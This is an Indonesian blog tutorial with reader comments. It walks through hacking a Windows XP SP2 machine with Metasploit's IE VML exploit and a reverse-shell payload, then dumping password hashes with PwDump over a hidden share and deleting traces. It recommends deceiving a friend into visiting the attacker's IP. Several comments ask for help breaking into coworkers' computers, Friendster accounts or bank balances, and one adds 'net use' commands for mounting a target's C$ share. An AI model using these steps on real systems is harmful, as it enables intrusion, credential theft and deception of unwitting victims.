Belajar Hack Yuck! (3) – Hack Windows XP SP2

14 11 2006

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja😀 ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus😀

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

 

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

 dump1.JPG

 Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

 

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

 

 

Reference :

http://www.metasploit.com


Actions

Information

219 responses

24 11 2006
numpang_lewat

ugh … lemot banget buka page coment nya😛

gud tut bro🙂

29 11 2006
Fadly

dir gw minta kepastian nih hari sabtu jadi ga ketemuan ?? bales gpl😀

27 03 2011
fadli

u cpa???????????

6 12 2006
miftah_co

Makasih lagi….
kayanya mulai sekarang aku mau jadi langganan pembaca setia kamu aja deh…

aku baru aja membaca artikel ini, eh langsung komentar…
maaf ya…
aku cuma mau ngucapin makasih…
makasiiiiih banget….

nanti aku coba tutor ini dan kukasih komentar lagi,,,
habis ini komentar yang betulan nih.. komentar habis dari praktek…

tapi ga bisa sehari dua. soale lagi ada tugas juga noh dari ortu

ok Bro…..
sementara itu kutunggu karya2mu selanjutnya…..

maju terus…………. semangat

11 12 2006
Andika

Aku PNS dinas Kimpraswil Ternate ( Maluku Utara ) yang tergila-gila akan hacking windows…ajarin aku yach..Kalo mau jln2 ksini jg boleh..coz oke bgt…

11 12 2006
chaidir

Selamat belajar bung Andika…
Ilmu itu terhampar begitu luas di Internet ini…
Silahkan salurkan ‘kegilaan’ hasrat belajar anda untuk kebaikan umat manusia… dan semoga tidak malah membuat orang lain menderita😀

30 07 2009
steven

saya ingin bljr tapi blom tau smua program hacker ni ,toong bntu saya

email YM saya stevenzz.boyzz@yahoo.com

saya ingin hack ID dota saja apakah bisa???

15 12 2006
sh0nn

Keren Bos..

6 01 2007
a9u5

Salam kenal bang chai…
Wuih hebat bang, bagus bgt content diweb-nya abang!! Aq suka bgt!!
Aq doa’in deh smg ilmunya abang nambah terus dan manfaat buat kebaikan qta smua, jgn bsn2 bang untuk terus bagi2 ilmunya.

Regards.

8 01 2007
arifien

mas,makasih dah bagi-bagi ilmunya.saya jadi bertambah semangat untuk belajar lebih baik.salam kenal buat mas chaidir!

16 01 2007
SuWito

mas,

koq kelihatan nya chinese bngt ya di foto,just fun question

Btw mas bole minta diajarin ga dasar-dasar seperti ilmu mas tentang hacking itu dari mana mas?

Ada website yang bisa di referensi kan mas?
Tapi yang aman gitu,jangan ampe mau belajar eh malah jadi korban hehe

tolong ya mas…

18 01 2007
alee

cakep banget dah tulisannya bos…. thx for this knowledge

24 01 2007
S3+i4

Banget Keren NYA!!!!!!!!

13 02 2007
wahyu

Mas (master) Saya mw praktek hack SP2 tp pemanasan dulu lewat vmware. Tp sayangnya ad masalah bwt nyeting virtual network connectionnya. Cma bikin 2 virtual pc, tp bikin koneksinya antara 2 vir.pc itu gak bsa2. Bsa tlgin bri tuntunan nya gak. makasih yo ter (master)

13 02 2007
wahyu

O ya, satu lg. Gimana si cra nyari kelemahan sistem operasi. Jd ntar klo ad yg baru lg biar nyari2 sendiri, gak perlu nunggu hasil orang laen trus totally njiplak (kayak BHN). makasih ter

13 02 2007
chaidir

to wahyu :
rajin2 aja ikutan milis or forum
ato coba pelajari metasploit.. sapa tau bisa bikin exploit sendiri

19 02 2007
fays

keren tuh….
tp ko ane dah coba ga jalan ya… ko lama nuggunya……
itu kalo dapet priv nya apa..??
user yg login aja ato system or admin??
klo guest ke adm pk apa..????
ane py tools yg dr limited user ke admin tp ga bisa bwt guest….

thx b4

26 02 2007
Maulana

gw sng abis ma nih artikel .
gw jg stj klo generasi gw terlalu wasting time cmn bwt bk fs ato nggak chating .
gw mw berguru donk ma lw .
Hhoho..
jwbnna krm k email gw iah !

1 03 2007
Ahmad Dzikir

Belum faham juga bro… pusing pusing…

3 03 2007
ghokagez

top mar kotop prend’s

3 03 2007
dedi

bang saya pemula nehhh
gmn cara masuk cmd.exe ke komputer orang lain menggunakan kabel LAN

7 03 2007
wiro

Baru masuk ne,sori pemula……..n mau bgt blajar.Trims n Love u all

7 03 2007
azay

hallo aku baru masuk lho aku mo gabung neh. dan ikt belajar bersama.

29 03 2007
NewbiE

Oi Oi, waiting for connection to http://172.16.13.206:80/ ampe se jam

cr ngeset biar jd 127.0.0.1, gmn ya??

dah nyari guide ama meterpreter kok g ada

tenkyu

29 03 2007
NewbiE

Gak jd dah bisa, mantab!. Gw bales nih manusia yg ngehack kompie gw, rasakan pembalasan ku!!

1 04 2007
lennon_depp

bro, kapan bisa chat

5 04 2007
phitoosh

bos kok nggak bisa aku pakai ie_vml_rectfill nya

apa karna firewall dari target diaktifin… kendala kegagalan apa aja bos biar kami bisa secara cepat memahami.
trims untuk semuanya

20 04 2007
Pegasus

Waw , thanks ya atas knowledgex, moga lebih hebat lagi…

26 04 2007
wannabegl10

duh bagus sekali tulisannya, tapi…..
ga ngehack dong kalo pake nyuruh target utk buka url kita
….
XP SP2 memang bikin susah, banyak banget exploit yg bisa sembunyi2 masuk ke komp target dengan silent mode, malah ga jalan di SP2

8 05 2007
yogo

Makasih atas ulasan kebetulan aku lagi bergerak dibidang warnet di kalimantan timur yang masih minim pengetahuan hari-hari warnetku pasti ada pc yang macet sedang untuk cloning setiap pc bth hardisk yaaaaaaaaaah tambah biaya lagi minta saran yang aman-aman aja itu kayak apalah tyrimmmmmmmmmmms

14 05 2007
galee

wakakakakakaka…..cool abiez dah :))

15 05 2007
the6reat

Salam kenal bro..
Saya sudah coba tips di atas dengan menggunakan 2 Komp yang terhubung lewat LAN.
Komputer target menggunakan Windows XP SP2, firewall dan antivirusnya sudah dinonaktifkan, step-step yang dijelaskan sudah saya coba tetapi masih belum berhasil connect masih pada tahap “waiting for Connections to http://10.64.28.113:80/ ” (alamat web di komp penyerang). Padahal sudah di komp target sudah saya refresh terus untuk connect ke alamat penyerang dan sudah berlangsung hampir 1 jam tapi belum connect. Kira-kira ada saran nggak bro untuk permasalahan tersebut??

22 05 2007
aaa
23 05 2007
andy Rhudes

dah gue coba tutorial metasploitnya tapi use ie_vml_rectfillnya ga ada, tapi gue coba pake use ie_objecttype, cuma sending payloadnya lama….. malah terkesan diam n gue belum bisa masuk ke komputer target.
Tolongin gue dong soalnya gue di isengin terus sama teman kantor yg sirik ma gue. PLEASE
regard
ANDY

25 05 2007
Adit

Mantep….

25 05 2007
dodi

aduch saya coba-coba hack win XPsp2 ternyata susah juga…. saya belum nemu kelemahannya + ama tools yang bagus.

kemaren saya coba hack pake framework2.6 ternyata ga jebol…!!!
giman donk ada solusinya ga?

thank(^_^)

2 06 2007
kangkung_ca

ajarin jd hacker bung,please!!!!!!!!!!1

8 06 2007
TRY_IT

WAH RUMIT TUH,KELAMAAN……!

8 06 2007
TRY_IT

kalo u dah tau ip target trz u mau hack tuh kompi,ikutin cara gw!gw dah berhasil tuh cm pake MS DOS Command kok….

C:\>net use \\ip_target, kalo ada keterangan
the command completly succesfully lanjut….

C:\>net use K: \\ip_target\c$,kalo ada keterangan
the command completly succesfully lanjut….

nah tinggal u liat deh di explorer u disitu ada drive C: si target,tinggal niat u apaan….good luck!!!!!!!!!!!!!!!

10 06 2007
wiro

klo kawan yang di banjar ada ga ya……ajarin dong

20 06 2007
ivanesense

sip, persis sama tujuanku sekarang…aku marah sama windows, warnetku sekarang ku ganti jadi linux semua…(hakhakhak… gara gara sweapingan). Windows memang Harus Dibumi hanguskan, di hack, plus dicekoki virus.
mas.. oh iya kalo bisa bikin artikel “tentang” software pelacak keberadaan Ponsel lewat IMEI mas. Hp di kos-kosan 9 hilang semua. sial. hakakhakhak “sekalian” softwarenya..

5 07 2007
garel007

mas ajari gw dunk… cara nge hack…… gw pake linux and mau belajar nge hack windows dalam satu jaringan LAN… (gw dah siapin 2 PC buat belajar ngehack), tp gw ga ngerti caranya, baru bisa pake nmap doang ne…. hehehe…. thanks ya mas………..

5 07 2007
agit

salam knal bro,artikelnya menarik sekali untuk dipelajarinya, mau nanya dunk? mau belajar hacker? mau tau tentang hacker apa? kelebihannya…. saya op warnet ,tp nda tau mengenai komputer gtu,trus ketika saya melihat artikel anda,jdi tertarik utk menambah ilmu gtu deh.hehehe

ups caranya rubah pAs FS begimana yach

tq sblmnya

15 07 2007
fajarbudhi

salam kenal,

saya baru ikut di dunia maya seperti sekarang, mohon bantuan untuk materi2 yang sebelumnya. klo bisa dari dasar sampai ketingkat lanjut…

terima kasih,

27 07 2007
Dewa Miznu

Bang Sebenernya Apa Si yang Paling di butuhin Biar jadi progemer sejati ? menurut Gue Sendiri Buat jadi Hack aj Susah N masih Bloon ” soalnya harus make Bantuan Software Bikinan Orang Luar , N Nyontek segala isinya . soalnya gw pernah denger cerita Temen Gue Waktu Ikut seminar IT Com di Singapure Orang indonesia Di Cap sebagai Tukang Nyontek N ga Bisa Nyiptain alias Gaptek !! kecian Deh orang Indo..

maju terus bang “

31 07 2007
ponira

hackin kita dunk…hehehehehe

15 08 2007
azli fahmi

saya mau mengenal menjadi hacker lebih dalam dunia internet
saya hanya bisa berharap untuk bisa melaksanakan dengan penuh

15 08 2007
azli fahmi

dengan ini saya mau menggali ilmu dalam dunia hacker semoga dengan ini saya dapat bantuan dalam menjalani program dengan baik …….
kalau andaikan anda dapat membantu saya menggali ilmu ini , sungguh saya akan mengabdikan kesemua orang bagi barang siapa yang membutuhkan saya saya sangat mau sekali menjadi programer sejati ,

16 08 2007
boerz

tp kok saya cek ie_vml_rectfill ga ada RHOST-nya???truz di win32_reverse cuman da LHOST aja??? mohon penerangannya… ^^

24 08 2007
administrator@neratel.com.sg

Basii!!!!!!
baru bisa make tool orang kayak gituh udah kaya jagoan aza!!
jebol server gw kalo emang lu jagoan.

10 09 2007
coba

wuiiiih… ampun dije….

ampun lah, ndak beraninya saya sama mastar chaidir ini…

jangan main hek-hekan, ndak baik, nanti kualat loh….

28 09 2007
kepitingjelek

kok,… loncat..loncat tutornya,..susah memahaminya
kalo cari netcat ga ada lagi
dimana nich

14 10 2007
GAdiZ

kk haidir,,,pliiz dunkz ajarin aku yang gampng ja tentang cr cari passwrd FS orang…cara yg diatas aku bener2 bingung
pliiiz negh email aku arniz_wonbin@yahoo.com
pux no hp ga?? kl bz cantumin yah,,,,,aku bener2 mau tau banyak tentang cara hack…
pliiz

23 10 2007
Whatever....!

HACKING IT`S NOT GOOD, CRACKING IT`S FINE.PLEASE BE A WISE GUYS…..!

17 07 2010
Tapir

Kebalik Kaleee…. -___-!!!

2 11 2007
khothob

duh lumayan susah.tp aku akan coba bljr

9 11 2007
andrado_naruto

hai,,,aku bru aja gabung n aku ingin sekali menjadi hecker,,,,,pliz,,,,,,,,,bantu aku ya,,,,,,,coz ada temanku yg usil,,,,
THANKs

15 11 2007
pcmav.org

viva hacker indonesia.

http://idvirus.com

19 11 2007
mau jadi hancker...?

gw sering bgt baca pesan yang mau jai hacker … gw mau bantu kamu2 yg mau jadi hack… tunggu bukanlah segala sesuatu harus berkorban dahulu…
setuju kan dengan itu …
untuk menjadi hacker kamu perlu buku panduan bung….
caranya…

kirim sms ke : 0888.235.7220..
ingat… segala sesuatunya harus ada perjuangan dan pengorbanan bung…..

just contact me..!!!

19 11 2007
mau jadi HACKER..?!!?

gw sering bgt baca pesan yang mau jadi hacker … gw mau bantu kamu2 yg mau jadi hacker… tunggu bukanlah segala sesuatu harus berkorban dahulu…
setuju kan dengan itu …
untuk menjadi hacker kamu perlu buku panduan bung….
caranya…

kirim sms ke : 0888.235.7220..
ingat… segala sesuatunya harus ada perjuangan dan pengorbanan bung…..

just contact me..!!!

27 11 2007
firel

bang,,, ajarin kita napa!!!”” cara yg gampang gitu” bwt hack,, biar jaga2 klo da yg usil,,, aye setuju tuh klo gack N’tu art

3 12 2007
christ

wow…..
makasih ya mas buat artikel ini…
saya sangat tertarik dengan informasi ini
sehingga saya ingin belajar hacker
kalo bisa masukin ya cara2nya
trus kita harus make ap

6 12 2007
senar putus

gila sumpah gw pengen bgt belajr ,tapi gw buta bgt ma networking. truss gmn yaaa…??

12 12 2007
hajir

makasih ya!!
sepertinya blog kamu bagus banget and aq mau belajar ni cara ngehack. entar bantuin aq ja!!!!
sekali lagi thx ya bro!!!

13 12 2007
azrol

Hey, im using measploit too. Apparently I cant get into a specific PC with WXPro SP2. Apparently your eg is based on a LAN. My questions are is it possible to hack a PC from another location. And is it possible to hack without social engineering? Thanks

PS: Sorry I cant speak indon. I understand a lil bit, but not all. I hope its not a hassle for you. Thank you.

14 12 2007
Deco

saya minta cara buat masuk ke server, tolong kirim ke aneh16@yahoo.com
trims

28 12 2007
zanuar

wuihh….. banyak banget yang mau jadi hacker…….
emang apa enaknya? jahilin orang trus merugikan orang kok bangga…….. ya…..
ya itulah orang indonesia…….. mentalnya udah terlanjur bobrok.

8 01 2008
Eirans’s Weblog

[…] Belajar Hack Yuck! (3) – Hack Windows XP SP2 […]

16 01 2008
19 01 2008
gala

woiiiiiiiiiii bagaimana caranya dapetin software buat ngelakuin hack,ada yang punya kirim yah,ane mau bljr neh bang

19 01 2008
sony

buat semua yang pintar and tau tentang semua baik dan buruk permasalahan komputer entah hacker,craker,dll.tolong dong kirim2 ilmunya.biar ntar bisa bersaing dengan yang baru belajar!!!!malikue_jo@yahoo.com

31 01 2008
asep fiad hasn

salam kenal ! Saya adalah seorang mahasiswa di prguruan tunggi swata di bandung, saya sangat suka sekali dengan dunia internet dan jaringan komputer. Saya sangat trtarik ingin bisa mmpelajari tentang hacker, dan saya mendapa kan situs, ini dan sangat seanang sekaligus sangat trbantu sekali. kalau bisa beri tahu saya milis yang menyediakan konsep tentang hecker yang lain. tahan’s semoga sukses !!!!!!!!.

2 02 2008
klepoon

@asep fiad hasn :
ikut aja milisnya jasakom-perjuangan@yahoogroups.com

6 02 2008
klepoon

sapa neh pake nick gw…. buat klepoon palsu gw tunggu lo di #malanghackerlink n #pusat jajan hacker thanks buat semuanya

6 02 2008
RUKnow

tip & trik dari saya cara cepat utk jadi hacker :
1. Pastikan Lokasi yg mau di HACK (Bank, Perusahaan, dll)
2. Pastikan OS yg digunakan (kalo bisa hindari AS400 / Mainframe)
3. Cari Identitas & Kenali Administratornya.
4. Siapkan Peralatan utk meng HACK yg paling handal
(Pisau, Revolver, AK, UZZY, StandGun, Granade, Bazoke, kalo perlu C4)
5. Eksekusi
6. TODONG KEPALANYA ADMIN UNTUK MENUNJUKKAN Login User dan PASSWORDNYA ROOT/SU/ADMINISTRATOR paksa hingga dapat.
7. Coba Remote dari jauh dan gunakan password itu, apakah sukses atau gagal kita login dengan password itu
8. Kalo masih gagal, persiapkan Granade / Bazoke / Kalo Pengen langsung sukses gunakan C4 dan ANCAM dan MINTALAH USER DAN PASSWORD untuk SUPER USER / ROOT / ADMINISTRATOR, jika tidak di beri maka perusahaan tersebut akan di ledakkan.
9. Dengan melakukan tahap ke 8, hampir 99% cara ini sukses dan berhasil
10. Setelah mendapatkan User dan Password SU/ROOT/ADMINISTRATOR maka gunakan user n password itu untuk login n mengolah data, mengUpDate WebSide, bikin User baru, UpLoad, Download, dll.
11. Proses Hacking telah selesai, maka untuk menghilangkan jejak, lakukan proses Bersih-bersih, Yaitu : Format hardisknya, n jangan lupa kalo mampu banting servernya agar hardisknya rusak🙂
12. Disinilah letak seni dari HACKER, betapa sulitnya kita mencari sebuah user name beserta passwordnya dengan level ROOT/SU/ADMINISTRATOR, dan cara ini juga manjur untuk membobol FriendsTer, Email Pacar, networking perusahaan, Dll.
13. Tiga Belas adalah angka sial, Selamat Mencoba… Jika Anda Mencoba… DIJAMIN tidak SELAMAT….
HEEEE kekeke…🙂
SUKSES BRO…. SUKSES ALL…

Best Regards,
-RUKnow-
-daf-

10 02 2008
giant

abang 2 n mas2
ikutan dong
tolong kasi tau dong cara ngilangin popup

10 02 2008
giant

mas
gimana caranya ngilangin Virus 80avp80.com
thank’s

24 02 2008
charel

wah moga-moga ilmunya mas tambah banyak ya agar bisa terus mbibing pemula kayak kita-kita ok.
wa doain nambah terus deh !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

9 03 2008
pram

wuih…
keren euy blogna…
isina mangstabs…

sampai jumpa di Borneo… kk achai…
hakakak…

31 03 2008
ade

KEREN ABISSS.. gw bs tambah pinter neeh,, mks yaa gw jd semangat jelalajah web kamu

31 03 2008
Firdaus

o ya ajain gue dong cara2 ngehack tu gimana…
ajarin dari A ampe Z ya…
coz gue kpengen bgt bisa ngehack…!
btw kalau nyari code2 tuk ngehack tu gimana n dimana dpatnya…?!

31 03 2008
Firdaus

oh ya jangan lupa blz ke email q ya soal gmana ca ngehack..
oce n thx b4….

3 04 2008
rangga

haloo bang…..

lam nl ych…

aq baru gabung ne,,,jd tolong paduan nya y…

plizz…

3 04 2008
rangga

hello semua nya…….
lm knl aja ych…

aq baru gabung ne,,,,,jd aq mohon petunjuk nya ych..

plizz

10 04 2008
Goro

salm knal dari Gw,kak gimana caranya W dapetin tool software metasploit framework? klo bisa kirimin kealamat aku ya……..please……..thank

11 04 2008
echan

sory kak nie jauh dari topik,
tapi mohon bantuan nya dunk
kok komp ku gk bisa conec internet pake firefox setelah di instal ulang
sebelumnya makasih

12 04 2008
NETWORK « Eirans’s Weblog

[…] Belajar Hack Yuck! (3) – Hack Windows XP SP2 […]

13 04 2008
NETWORK « Eirans’s Web

[…] Belajar Hack Yuck! (3) – Hack Windows XP SP2 […]

13 04 2008
Obout Saputra

bisa minta tutor panduan menjadi hacker

13 04 2008
Obout Saputra

giman cara mbuka regedit yang terkunci?

20 04 2008
adi

gmana caranya ngehack friendster…????

lam knal aj dh>> ^_-

21 04 2008
Me

Niy tutor dah skala agak menengah, yg mau ngerti dari dasar tulis email kmu ke komen blog aq, pasti dibantu . . .
Tha..
Smangat para lamer!!

26 04 2008
chinme

wah…………..boleh nih….

6 05 2008
belajar hack yuck!!! (1) Konsep dasar hacking. « FIREX

[…] Belajar Hack Yuck! (2) – What is an Exploit? Belajar Hack Yuck! (3) – Hack Windows XP SP2 » […]

8 05 2008
naro

abang2 Yang jago ngehack……
Ajarin donk caranya nge hack,Coz Q sering banget di permaini ama tmn2 yang sok jagoan nge hack……. T.T

13 05 2008
Kurnia

Saya ingin belajar hack saldo bank dong.Bisa gak ajarin saya?
saya ingin menambah saldo saya di bank tanpa memasuki uang.makasih yaa…
Saya uda cape dan benci jadi orang miskin, bego dan terhina begini.
Pacar saya pun kalo marah, dia curhat ke cowo yang kaya.
dia juga lebih senang dengan cowo yang kaya itu.selalu berhubungan dekat banget.
sya jadi benci kaya begini.
Saya juga mau jadi kaya jadi gak terhina begini.
Tolong yaaaa kak.
makasih.

22 05 2008
supriadi

iya bang,jd org bodoh,susah….kerjaan nungguin yg g pasti……

ajarin hacker,carding ato apalah ntu….

klo berhasil saya doakan masuk sorga dech bang……

banyak yg ngeluh,susahnya jadi org miskin…..

23 05 2008
pandawa

wah…bagus banget nich…bagusnya lagi nyediain toolsnya.khan ga repot ngeLink…tapi ok banget ko’,bisa dicoba…maju terus..aku tunggu karya kamu selanjutnya…

28 05 2008
daang adrian

good… good…
ini yang saya cari.
saya sering diganggu dgn teman yang notabennya master hecker, dia sering acak2 email dan friendster saya.
ijinkan saya join.

28 05 2008
Anank

Hmmm………….
Dari dulu aku pgn bgt jd hacker yg ngebantu polisi nangkep hacker, phreaker, ma cracker yg ganggu komputer orang, apalagi ganggu komp pemerintah. tp, sdikit pun aku g mudeng bahasa program atau coding. om chaidir, bantu aku ya… kirim ke e-mailku, carany blajar bahasa pemrograman. plissss…………..

31 05 2008
pupunk

Halo Mas…….!!!!!
Kirim Donk Artikelnya Ke Email Gue…..,Biar Gue Pinter Kaya Mas ya….
Seksesss terus….

3 06 2008
Lez

Gabung Juga ah!!!🙂

4 06 2008
icow

sebelumnya maaf!saya mau tanya!
kalo windows yang udah pake vista tranformation pack itu gimana bikin balik kaya semula?kalo bisa ga diinstal ulang bisa ga?
tolong dibalas ke email saya!
terimakasih!

4 06 2008
joni

mas mau tanya nih!
maff sebelumnya!mas kalo cara ngebackup gimana!terus kalo mau tau spesifikasi komputer lewat menu run gimana?pa masuk ke registry juga?dan kalo ngebackup registry itu giman caranya?
tolong dibalas ya mas!tolong dimaklumi saya masih awam!

6 06 2008
fei

alow tmn2.leh ga ajarin gue donk biar jadi hecker.coalnya gue pengen jadi hecker😦

10 06 2008
nurdien

wah mau donk belajar jadi hacker…..!! mohon bantuannya [-o<

12 06 2008
afdal

bagus…banget penjelasannya
Thx

8 07 2008
Yudaxxx

boleh nih buat belajar ? link tool hack nya mana.

6 08 2008
hans

minta tutorial cara hacker donk…
klo gak…buku2 apa aja yg bagus buat panduan??

emang klo mu jadi hacker harus jago bahsa pemograman yah.??
tool2 ama program2 apa aja yg harus punya klo mu ngehack sesuatu??
repz ASAP…!!!

14 08 2008
jecky

boleh minta referensi buku
nya donk

5 09 2008
felixs

Thanks yah bos,,,,

5 09 2008
ian

makasih dah bg bg ilmnya

5 09 2008
ian

mksh dah bg2 ilmu nya ya

10 09 2008
h3nkqiu

Bos Numpang di tempat orang …
Tapi pengen tuh tutor yang laen .. aku blom dapet tuh mesploit… boleh kan minta dari sesepuh….😀
kirim yach ke h3nkqiu@gmail.com

Thank’s anyway

19 09 2008
otonk

siap! u a my master……….!!

19 09 2008
onealhide

km jg bisa gabungan disini asyik jg mungkin jg kalian jg bisa gabung silakan aja coba ikutin link ini.
http://www.onealsamba.co.cc

21 09 2008
Egick

hmn…

dunia mank aneh,,,

14 10 2008
setio

ngak aSIK ah………………………
yg asik bobol bank n dpt duwit banyak….
hehehehehehhehehehhehehhe

29 10 2008
Harri

that’s cool, kueren dah

29 10 2008
Harri

Aduh moga-moga gw ga kena ma cracker

29 10 2008
pradita

1.kak dimana+gimana cara belajar bahasa pemrograman . . . . .
2.kak cara menghack friendster itu gimana caranya . . . ?

3 11 2008
Al-carati

Bagi rekan2 yg pengen memperdalam dunia hacking,audit situs,etc….Gw saranin gabung aja di forum http://www.yogyafree.net , http://www.jasakom.com , http://www.echo.or.id ,etc

10 11 2008
jane clastro

mas tolong kirirnin artikel ttg hack dong

yayaya……..

pliss bwat praktikum nie……………………..

+_+

plisssssssssssssssssssss……………………………

12 11 2008
:)

COOL😉

15 11 2008
surpin

bagian ke 2 mana ya? minta linknya donk

25 11 2008
aan

Boss……kata2ya di perjelas…..maklum q baru belajar
bahasanya ada yang gk ngerti………??
bisa gk lebih detail lagi???

24 12 2008
Ekky Genio

Thx BoZ…….atas infonya
Sebenernya saya baru newbie dalam dunia hacking
Tolong diperjelas lagi ya boz…. Lebih detail lagi maksudnya….
Supaya saya bisa ngehack komputer temen saya
HAHAHAHAHA……………………………..😀

25 12 2008
fajar

mas kalo ada blog seperti ini lagi kirim k email saya
bihun_di_kuah@yahoo.com

30 12 2008
isa

mas…guwe tertarik ma artikelnya…bole gag klo aq sebarin artikel mas lewat blog aq…skalian promosiin mas????hehehe

31 12 2008
meta-tora

mas saia ingin fokus networking tolong bimbingannya ia.!!!!

dassar networking it apa iiaaa tolongg berikan susunanya ia mas mulai dari dasar..

mohon bimbingannya !!!

13 01 2009
tommy

mas jujur q udah tau cara menjebol pasword & rahasia orang tau perusahaan lau leh tau gimana sih cara mencari kode yang memang tidak bisa di buka toooooollllllllooooonnnnnnnnnnnnnggggggggggggggg beri tau ya and kirimkan ke rohma 15@yahoo.co.id

28 01 2009
tip’s2 « Namaguemaiaratugitulho’s Blog

[…] Hacking Windows XP SP2 […]

28 01 2009
joe

kk… tolong kirimin ebook nya donk…
gw blon sempet bca cie….
please kkkkkk…… kirim di joe_mystrey@yahoo.com..
sekalian jga dgan tool nya yach..
hehe…. maklum kk gw masih newbi ce….
